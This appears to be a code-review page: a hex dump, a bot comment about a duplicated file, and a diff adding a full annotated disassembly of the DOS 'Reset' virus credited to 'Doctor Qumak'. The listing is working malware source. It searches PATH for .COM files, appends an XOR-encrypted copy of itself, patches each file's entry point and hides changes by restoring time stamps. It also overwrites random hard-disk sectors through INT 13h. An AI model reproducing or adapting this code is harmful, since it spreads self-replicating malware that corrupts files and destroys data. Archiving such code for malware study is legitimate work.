114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.
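Review bot: This Reset virus listing repeats the section immediately above it: everything visible there, from the `MOV AX,4200`/`INT 21` block at offset 02C2 through the end of the dump list, is byte-identical to the same stretch here, so the same disassembly appears to be committed twice, presumably under two file names. If both copies are intentional (for example two archive sources), a first-line note such as `; same Reset virus listing is added twice in this commit; both copies kept for archival provenance` in one of them would save readers diffing them; otherwise one copy should be dropped. The hunk header counts 571 added lines while roughly 514 are rendered here, so blank lines were probably lost in rendering and the duplicate check should be confirmed on the raw files.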


@ -0,0 +1,533 @@
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: jmp l_02F3 ;0100 E9 01F0
db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E
org 2F3h
;----------------------------------------------
l_02F3: push cx ;02F3 51
mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683
nop ;02F7 90
;<--------- encoding
push dx ;02F8 52
pop bx ;02F9 5B
mov cx,0F9h ;coded block length ;02FA B9 00F9
mov si,dx ;02FD 8B F2
dec si ;02FF 4E
mov dl,[si] ;0300 8A 14
inc si ;0302 46
l_0303: mov al,[bx] ;encoding loop ;0303 8A 07
xor al,dl ;0305 32 C2
nop ;0307 90
mov [bx],al ;0308 88 07
inc bx ;030A 43
loop l_0303 ;030B E2 F6
mov dx,si ;030D 8B D6
;<----- restore changed bytes
xor ax,ax ;030F 33 C0
xor bx,bx ;0311 33 DB
cld ;0313 FC
mov si,dx ;0314 8B F2
add si,0ADh ;x_00AD ;saved bytes address ;0316 .81 C6 00AD
mov di,100h ;target address ;031A .BF 0100
mov cx,7 ;changed bytes ;031D B9 0007
nop ;0320 90
rep movsb ;0321 F3/ A4
mov si,dx ;0323 8B F2
mov byte ptr ds:[si+0F8h],0 ;x_00F8 ;0325 C6 84 00F8 00
mov ah,30h ;get DOS version nr ;032A B4 30
int 21h ;032C CD 21
cmp al,0 ;major version ;032E 3C 00
nop ;0330 90
jnz l_0335 ;0331 75 02
nop ;0333 90
nop ;0334 90
l_0335: mov bp,0BFh ;x_00BF ;0335 BD 00BF
add bp,si ;0338 03 EE
mov byte ptr ds:[bp],0 ;033A 3E: C6 46 00 00
push es ;033F 06
nop ;0340 90
mov ah,2Fh ;get DTA ptr into es:bx ;0341 B4 2F
int 21h ;0343 CD 21
mov [si],bx ;x_0000 ;0345 89 1C
mov [si+2],es ;x_0002 ;0347 8C 44 02
pop es ;034A 07
mov dx,5Fh ;x_005F ;034B .BA 005F
add dx,si ;034E 03 D6
mov ah,1Ah ;set DTA to ds:dx ;0350 B4 1A
int 21h ;0352 CD 21
push es ;0354 06
push si ;0355 56
mov es,ds:[2Ch] ;environment segment ;0356 8E 06 002C
mov di,0 ;035A .BF 0000
l_035D: pop si ;035D 5E
push si ;035E 56
add si,1Ah ;x_001A ('PATH=') ;035F 83 C6 1A
lodsb ;0362 AC
mov cx,8000h ;0363 B9 8000
repne scasb ;0366 F2/ AE
mov cx,4 ;0368 B9 0004
l_036B: lodsb ;036B AC
scasb ;036C AE
jnz l_035D ;036D 75 EE
loop l_036B ;036F E2 FA
;<----- Environment variable 'PATH='
pop si ;0371 5E
pop es ;0372 07
mov [si+16h],di ;x_0016 ;0373 89 7C 16
mov di,si ;0376 8B FE
add di,1Fh ;x_001F = work buffer ;0378 83 C7 1F
mov bx,si ;037B 8B DE
add si,1Fh ;x_001F = work buffer ;037D 83 C6 1F
mov di,si ;0380 8B FE
jmp short l_03CE ;0382 EB 4A
;<----- next directory
l_0384: cmp word ptr [si+16h],0 ;x_0016 = ptr in env ;0384 83 7C 16 00
jne l_0392 ;-> not all in 'PATH' ;0388 75 08
mov byte ptr ds:[si+0F8h],1 ;<- end of 'PATH' ;038A C6 84 00F8 01
jmp l_04E9 ;038F E9 0157
l_0392: push ds ;0392 1E
push si ;0393 56
mov bp,0BFh ;x_00BF ;0394 .BD 00BF
add bp,si ;0397 03 EE
mov ds,es:[02Ch] ;environment segment ;0399 26: 8E 1E 002C
mov di,si ;039E 8B FE
mov si,es:[di+16h] ;ptr in environment ;03A0 26: 8B 75 16
add di,1Fh ;pattern address ;03A4 83 C7 1F
l_03A7: lodsb ;03A7 AC
cmp al,';' ;directory delimiter ;03A8 3C 3B
je l_03BB ;03AA 74 0F
cmp al,0 ;03AC 3C 00
je l_03B8 ;position delimiter ;03AE 74 08
mov es:[bp],al ;03B0 26: 88 46 00
inc bp ;03B4 45
stosb ;03B5 AA
jmp short l_03A7 ;03B6 EB EF
l_03B8: mov si,0 ;end of path ptr ;03B8 .BE 0000
l_03BB: pop bx ;03BB 5B
pop ds ;03BC 1F
mov [bx+16h],si ;save current ptr ;03BD 89 77 16
cmp byte ptr [di-1],'\' ;last path char ;03C0 80 7D FF 5C
je l_03CE ;-> o.k. ;03C4 74 08
mov al,'\' ;<- add dir delimiter ;03C6 B0 5C
mov es:[bp],al ;03C8 26: 88 46 00
inc bp ;03CC 45
stosb ;03CD AA
l_03CE: mov byte ptr es:[bp],0 ;x_00BF ;03CE 26: C6 46 00 00
mov bp,0 ;03D3 BD 0000
mov [bx+18h],di ;[x_0018]:=x_001F ;03D6 89 7F 18
mov si,bx ;offset d_0683 ;03D9 8B F3
add si,10h ;x_0010 ('*.COM') ;03DB 83 C6 10
mov cx,6 ;03DE B9 0006
rep movsb ;03E1 F3/ A4
mov si,bx ;03E3 8B F3
mov ah,4Eh ;find 1st filenam match @ds:dx ;03E5 B4 4E
mov dx,01Fh ;x_001F (file pattern) ;03E7 .BA 001F
add dx,si ;03EA 03 D6
mov cx,3 ;attribute pattern ;03EC B9 0003
int 21h ;03EF CD 21
jmp short l_0429 ;03F1 EB 36
;<----- next file in the same directory
l_03F3: mov bp,0BFh ;file name address ;03F3 .BD 00BF
add bp,si ;03F6 03 EE
push bp ;03F8 55
mov ax,0 ;03F9 B8 0000
dec bp ;03FC 4D
l_03FD: inc bp ;03FD 45
cmp byte ptr ds:[bp],'\' ;begin of file name ;03FE 3E: 80 7E 00 5C
jne l_0407 ;0403 75 02
mov ax,bp ;possibly here ;0405 8B C5
l_0407: cmp byte ptr ds:[bp],0 ;end of filename ? ;0407 3E: 80 7E 00 00
jne l_03FD ;-> not now ;040C 75 EF
cmp ax,0 ;have been any dir ? ;040E 3D 0000
pop bp ;0411 5D
jnz l_041B ;-> yes ;0412 75 07
mov byte ptr ds:[bp],0 ;<- we are in the root ;0414 3E: C6 46 00 00
jmp short l_0425 ;0419 EB 0A
l_041B: mov bp,ax ;end of path address ;041B 8B E8
mov byte ptr ds:[bp+1],0 ;end ptr ;041D 3E: C6 46 01 00
mov bp,0 ;0422 BD 0000
l_0425: mov ah,4Fh ;find next file match ;0425 B4 4F
int 21h ;0427 CD 21
l_0429: jnc l_042E ;0429 73 03
jmp l_0384 ;-> end of files in current dir ;042B E9 FF56
l_042E: mov bp,0BFh ;x_00BF = victim name ;042E .BD 00BF
add bp,si ;0431 03 EE
dec bp ;0433 4D
l_0434: inc bp ;0434 45
cmp byte ptr ds:[bp],0 ;find end of path ;0435 3E: 80 7E 00 00
jne l_0434 ;043A 75 F8
mov di,bp ;043C 8B FD
mov bp,0 ;043E BD 0000
push si ;0441 56
add si,7Dh ;x_007D - DTA-file name ;0442 83 C6 7D
l_0445: lodsb ;add file name ;0445 AC
stosb ;0446 AA
cmp al,0 ;0447 3C 00
jne l_0445 ;0449 75 FA
pop si ;044B 5E
mov dx,si ;044C 8B D6
add dx,0BFh ;x_00BF = file name ;044E .81 C2 00BF
mov ax,3D00h ;open file R/O ;0452 B8 3D00
int 21h ;0455 CD 21
jnc l_045C ;0457 73 03
jmp l_0384 ;-> error, next dir ;0459 E9 FF28
l_045C: mov bx,ax ;file handle ;045C 8B D8
mov dx,0B8h ;x_00B8 = file buffer ;045E .BA 00B8
add dx,si ;0461 03 D6
mov cx,7 ;bytes to read ;0463 B9 0007
mov ah,3Fh ;read handle ;0466 B4 3F
int 21h ;0468 CD 21
mov ah,3Eh ;close handle ;046A B4 3E
int 21h ;046C CD 21
mov di,0BBh ;4,5,6,7 bytes from file;046E .BF 00BB
add di,si ;0471 03 FE
mov bx,0B4h ;contam. ptr pattern ;0473 .BB 00B4
add bx,si ;0476 03 DE
mov ax,[di] ;0478 8B 05
cmp ax,[bx] ;047A 3B 07
jne l_0489 ;-> not infected yet ;047C 75 0B
mov ax,[di+2] ;047E 8B 45 02
cmp ax,[bx+2] ;0481 3B 47 02
jne l_0489 ;-> not infected yet ;0484 75 03
l_0486: jmp l_03F3 ;-> allready infected ;0486 E9 FF6A
l_0489: cmp word ptr [si+79h],0FA00h ;file size ;0489 81 7C 79 FA00
nop ;048E 90
ja l_0486 ;-> to big ;048F 77 F5
cmp word ptr [si+79h],0Ah ;file size ;0491 83 7C 79 0A
jb l_0486 ;-> to small ;0495 72 EF
mov di,[si+18h] ;678Bh ?? ;0497 8B 7C 18
push si ;049A 56
add si,7Dh ;DTA - file name ;049B 83 C6 7D
l_049E: lodsb ;049E AC
stosb ;049F AA
cmp al,0 ;04A0 3C 00
jne l_049E ;04A2 75 FA
pop si ;04A4 5E
mov ax,4300h ;get file attrb, nam@ds:dx ;04A5 B8 4300
mov dx,01Fh ;file name ;04A8 .BA 001F
push si ;04AB 56
pop si ;04AC 5E
add dx,si ;04AD 03 D6
int 21h ;04AF CD 21
mov [si+8],cx ;save oryginal attributes ;04B1 89 4C 08
mov ax,4301h ;set file attrb, nam@ds:dx ;04B4 B8 4301
and cl,0FEh ;clear R/O ;04B7 80 E1 FE
mov dx,01Fh ;04BA .BA 001F
add dx,si ;04BD 03 D6
int 21h ;04BF CD 21
mov ax,3D02h ;open file R/W ;04C1 B8 3D02
mov dx,01Fh ;file name address ;04C4 .BA 001F
add dx,si ;04C7 03 D6
int 21h ;04C9 CD 21
jnc l_04D0 ;-> O.K. ;04CB 73 03
jmp l_0638 ;-> error ;04CD E9 0168
l_04D0: mov bx,ax ;file handle ;04D0 8B D8
mov ax,5700h ;get file date & time ;04D2 B8 5700
int 21h ; DOS Services ah=function 57h ;04D5 CD 21
mov [si+4],cx ;04D7 89 4C 04
mov [si+6],dx ;04DA 89 54 06
mov ah,2Ch ;get time ;04DD B4 2C
int 21h ;04DF CD 21
and dh,7 ;seconds ;04E1 80 E6 07
jz l_04E9 ;04E4 74 03
jmp l_0572 ;-> contamine ;04E6 E9 0089
;<- end of 'PATH' members
l_04E9: push bx ;04E9 53
push si ;04EA 56
mov ah,8 ;read parameters for drive dl ;04EB B4 08
mov dl,80h ;HDD 0 ;04ED B2 80
int 13h ;04EF CD 13
cmp dl,0 ;nr of fixed disks ;04F1 80 FA 00
je l_0562 ;-> no HDD ;04F4 74 6C
mov al,cl ;04F6 8A C1
and al,3Fh ; '?' ;04F8 24 3F
mov ds:[si+0F4h],al ;04FA 88 84 00F4
mov al,ch ;04FE 8A C5
mov ah,cl ;0500 8A E1
and ah,0C0h ;0502 80 E4 C0
mov cl,6 ;0505 B1 06
shr ah,cl ;0507 D2 EC
mov ds:[si+0F1h],ax ;0509 89 84 00F1
mov ds:[si+0F3h],dh ;050D 88 B4 00F3
l_0511: mov ah,2Ch ; ',' ;0511 B4 2C
int 21h ; DOS Services ah=function 2Ch ;0513 CD 21
; get time, cx=hrs/min, dh=sec
shr dl,1 ;0515 D0 EA
shr dl,1 ;0517 D0 EA
and dl,7 ;0519 80 E2 07
cmp dl,ds:[si+0F3h] ;051C 3A 94 00F3
ja l_0511 ;0520 77 EF
mov ds:[si+0F7h],dl ;0522 88 94 00F7
push ds ;0526 1E
mov ax,0 ;0527 B8 0000
mov ds,ax ;052A 8E D8
mov bx,046Ch ;052C .BB 046C
mov ax,[bx] ;052F 8B 07
mov dx,[bx+2] ;0531 8B 57 02
pop ds ;0534 1F
div word ptr ds:[si+0F1h] ;0535 F7 B4 00F1
l_0539: cmp dx,ds:[si+0F1h] ;0539 3B 94 00F1
jbe l_0543 ;053D 76 04
shr dx,1 ;053F D1 EA
jmp short l_0539 ;0541 EB F6
l_0543: mov ds:[si+0F5h],dx ;0543 89 94 00F5
mov ax,dx ;0547 8B C2
mov dl,80h ;0549 B2 80
mov dh,ds:[si+0F7h] ;054B 8A B4 00F7
mov ch,al ;054F 8A E8
mov cl,6 ;0551 B1 06
shl ah,cl ;0553 D2 E4
mov cl,ah ;0555 8A CC
mov ah,3 ;0557 B4 03
or cl,1 ;0559 80 C9 01
mov al,ds:[si+0F4h] ;055C 8A 84 00F4
int 13h ; Disk dl=drive 0 ah=func 03h ;0560 CD 13
; write sectors from mem es:bx
;<-----
l_0562: pop si ;0562 5E
pop bx ;0563 5B
cmp byte ptr ds:[si+0F8h],0 ;x_00F8 ;0564 80 BC 00F8 00
je l_056E ;-> O.K. ;0569 74 03
jmp l_0647 ;-> no 'PATH' ;056B E9 00D9
l_056E: jmp l_0628 ;056E E9 00B7
nop ;0571 90
;<----- contamine file
l_0572: mov ah,3Fh ; '?' ;0572 B4 3F
mov cx,7 ;0574 B9 0007
mov dx,0ADh ;0577 .BA 00AD
add dx,si ;057A 03 D6
int 21h ; DOS Services ah=function 3Fh ;057C CD 21
; read file, cx=bytes, to ds:dx
jnc l_0583 ;057E 73 03
jmp l_0628 ;0580 E9 00A5
l_0583: cmp ax,7 ;0583 3D 0007
je l_058B ;0586 74 03
jmp l_0628 ;0588 E9 009D
l_058B: mov ax,4202h ;058B B8 4202
mov cx,0 ;058E B9 0000
mov dx,0 ;0591 BA 0000
int 21h ; DOS Services ah=function 42h ;0594 CD 21
; move file ptr, cx,dx=offset
jnc l_059B ;0596 73 03
jmp l_0628 ;0598 E9 008D
l_059B: mov cx,ax ;059B 8B C8
sub ax,3 ;059D 2D 0003
mov [si+0Eh],ax ;05A0 89 44 0E
add cx,490h ;05A3 81 C1 0490
mov di,si ;05A7 8B FE
sub di,38Eh ;05A9 81 EF 038E
mov [di],cx ;05AD 89 0D
mov ah,40h ; '@' ;05AF B4 40
mov cx,489h ;05B1 B9 0489
mov dx,si ;05B4 8B D6
sub dx,390h ;05B6 81 EA 0390
push dx ;05BA 52
push cx ;05BB 51
push bx ;05BC 53
push ax ;05BD 50
mov ah,2Ch ; ',' ;05BE B4 2C
int 21h ; DOS Services ah=function 2Ch ;05C0 CD 21
; get time, cx=hrs/min, dh=sec
mov dl,cl ;05C2 8A D1
add dl,dh ;05C4 02 D6
add dl,82h ;05C6 80 C2 82
mov [si-1],dl ;05C9 88 54 FF
mov bx,si ;05CC 8B DE
mov cx,0F9h ;05CE B9 00F9
l_05D1: mov al,[bx] ;05D1 8A 07
xor al,dl ;05D3 32 C2
mov [bx],al ;05D5 88 07
inc bx ;05D7 43
loop l_05D1 ;05D8 E2 F7
pop ax ;05DA 58
pop bx ;05DB 5B
pop cx ;05DC 59
pop dx ;05DD 5A
int 21h ; DOS Services ah=function 40h ;05DE CD 21
; write file cx=bytes, to ds:dx
push dx ;05E0 52
push cx ;05E1 51
push bx ;05E2 53
push ax ;05E3 50
mov bx,si ;05E4 8B DE
mov cx,0F9h ;05E6 B9 00F9
mov dl,[si-1] ;05E9 8A 54 FF
l_05EC: mov al,[bx] ;05EC 8A 07
xor al,dl ;05EE 32 C2
nop ;05F0 90
mov [bx],al ;05F1 88 07
inc bx ;05F3 43
loop l_05EC ;05F4 E2 F6
pop ax ;05F6 58
pop bx ;05F7 5B
pop cx ;05F8 59
pop dx ;05F9 5A
jc l_0628 ;05FA 72 2C
cmp ax,489h ;05FC 3D 0489
jne l_0628 ;05FF 75 27
mov ax,4200h ;0601 B8 4200
nop ;0604 90
mov cx,0 ;0605 B9 0000
mov dx,0 ;0608 BA 0000
int 21h ; DOS Services ah=function 42h ;060B CD 21
; move file ptr, cx,dx=offset
jc l_0628 ;060D 72 19
mov ah,40h ; '@' ;060F B4 40
mov cx,3 ;0611 B9 0003
mov dx,si ;0614 8B D6
add dx,0Dh ;0616 83 C2 0D
int 21h ; DOS Services ah=function 40h ;0619 CD 21
; write file cx=bytes, to ds:dx
mov cx,4 ;061B B9 0004
mov dx,si ;061E 8B D6
add dx,0B4h ;0620 .81 C2 00B4
mov ah,40h ; '@' ;0624 B4 40
int 21h ; DOS Services ah=function 40h ;0626 CD 21
; write file cx=bytes, to ds:dx
l_0628: mov dx,[si+6] ;0628 8B 54 06
nop ;062B 90
mov cx,[si+4] ;062C 8B 4C 04
mov ax,5701h ;062F B8 5701
int 21h ; DOS Services ah=function 57h ;0632 CD 21
; get/set file date & time
mov ah,3Eh ; '>' ;0634 B4 3E
int 21h ; DOS Services ah=function 3Eh ;0636 CD 21
; close file, bx=file handle
l_0638: mov ax,4301h ;0638 B8 4301
mov cx,[si+8] ;063B 8B 4C 08
mov dx,01Fh ;063E .BA 001F
nop ;0641 90
add dx,si ;0642 03 D6
nop ;0644 90
int 21h ; DOS Services ah=function 43h ;0645 CD 21
; get/set file attrb, nam@ds:dx
;<----- EXIT
l_0647: push ds ;0647 1E
mov ah,1Ah ;set DTA to ds:dx ;0648 B4 1A
mov dx,[si] ;saved victim DTA ;064A 8B 14
mov ds,[si+2] ;064C 8E 5C 02
int 21h ;064F CD 21
pop ds ;restore registers ;0651 1F
pop cx ;0652 59
xor ax,ax ;0653 33 C0
xor bx,bx ;0655 33 DB
xor dx,dx ;0657 33 D2
xor si,si ;0659 33 F6
nop ;065B 90
mov di,100h ;Victim entry point ;065C .BF 0100
nop ;065F 90
push di ;0660 57
nop ;0661 90
xor di,di ;0662 33 FF
retn ;-> run victim ;0664 C3
db 1,2,3 ;0665 01 02 03
db 1,2,3 ;0668 01 02 03
db 4,5,6 ;066B 04 05 06
db 0Dh,0Ah ;066E 0D 0A
db '(C) DOCTOR QUMAK' ;0670 28 43 29 20 44 4F 43 54
;0678 4F 52 20 51 55 4D 41 4B
db 0Dh,0Ah ;0680 0D 0A
db 0B6h ;klucz kodowania ;0682 B6
d_0683 label byte
x_0000 dw 0080h ;victim DTA offset ;0000 80 00
x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10
x_0004 dw 9BEFh ;victim time stamp ;0004 EF 9B
x_0006 dw 1587h ;victim date stamp ;0006 87 15
x_0008 dw 0020h ;victim attribute ;0008 20 00
db 0E9h,0F9h,00h ;000A E9 F9 00
db 0E9h,0F0h,01h ;000D E9 F0 01
x_0010 db '*.COM',0 ;0010 2A 2E 43 4F 4D 00
x_0016 dw 002Ah ;ptr in environment ;0016 2A 00
x_0018 dw 678Bh ;??? ;0018 8B 67
x_001A db 'PATH=' ;001A 50 41 54 48 3D
x_001F db 'CS.COM',0 ;001F 43 53 2E 43 4F 4D 00
db '.COM', 0 ;0026 2E 43 4F 4D 00
db 'T.COM', 0 ;002B 54 2E 43 4F 4D 00
db 'OM',0 ;0031 4F 4D 00
db 43 dup (' ') ;0034 002B[20]
;<----- virus DTA
x_005F db 04h ;005F 04
db '????????COM' ;0060 0008[3F] 43 4F 4D
db 03h,14h,00h,51h,01h,00h,00h,00h,00h ;006B 03 14 00 51 01 00 00 00 00
x_0074 db 20h ;attribute found ;0074 20
x_0075 dw 9BEFh ;time stamp ;0075 EF 9B
x_0077 dw 1587h ;date stamp ;0077 87 15
x_0079 dw 01F3h,0 ;file size ;0079 F3 01 00 00
x_007D db 'CS.COM',0,' COM',0,0 ;file name ;007D 43 53 2E 43 4F 4D 00 20 43 4F 4D 00 00
db 0EAh,0F0h ;008A EA F0
db 0FFh, 00h,0F0h ;008C FF 00 F0
db 'Hello world from my virus !',0Dh,0Ah,'$' ;008F 48 65 6C 6C 6F 20
;0095 77 6F 72 6C 64 20
;009B 66 72 6F 6D 20 6D
;00A1 79 20 76 69 72 75
;00A7 73 20 21 0D 0A 24
;<----- Saved victim bytes
x_00AD db 0EBh,00h,1Eh,0B8h,00h,00h,50h ;00AD EB 00 1E B8 00 00 50
;contamination pattern
x_00B4 db 6Bh,73h,0CAh,0Eh ;00B4 6B 73 CA 0E
;<----- file buffer
x_00B8 db 0EBh,00h,1Eh ;00B8 EB 00 1E
x_00BB db 0B8h,00h,00h,50h ;contam.ptr.here ;00BB B8 00 00 50
x_00BF db 'CS.COM',0 ;file name & path ;00BF 43 53 2E 43 4F 4D 00
db '.COM',0 ;00C6 2E 43 4F 4D 00
db 'T.COM', 0 ;00CB 54 2E 43 4F 4D 00
db 'M',0 ;00D1 4D 00
db ' the stuff that should be here' ;00D3 20 74 68 65 20 73
;00D9 74 75 66 66 20 74
;00DF 68 61 74 20 73 68
;00E5 6F 75 6C 64 20 62
;00EB 65 20 68 65 72 65
x_00F1 dw 0 ;00F1 00 00
x_00F3 db 0 ;00F3 00
x_00F4 db 0 ;00F4 00
x_00F5 dw 0 ;00F5 00 00
x_00F7 db 0 ;00F7 00
x_00F8 db 0 ;1=no path ;00F8 00
seg_a ends
end start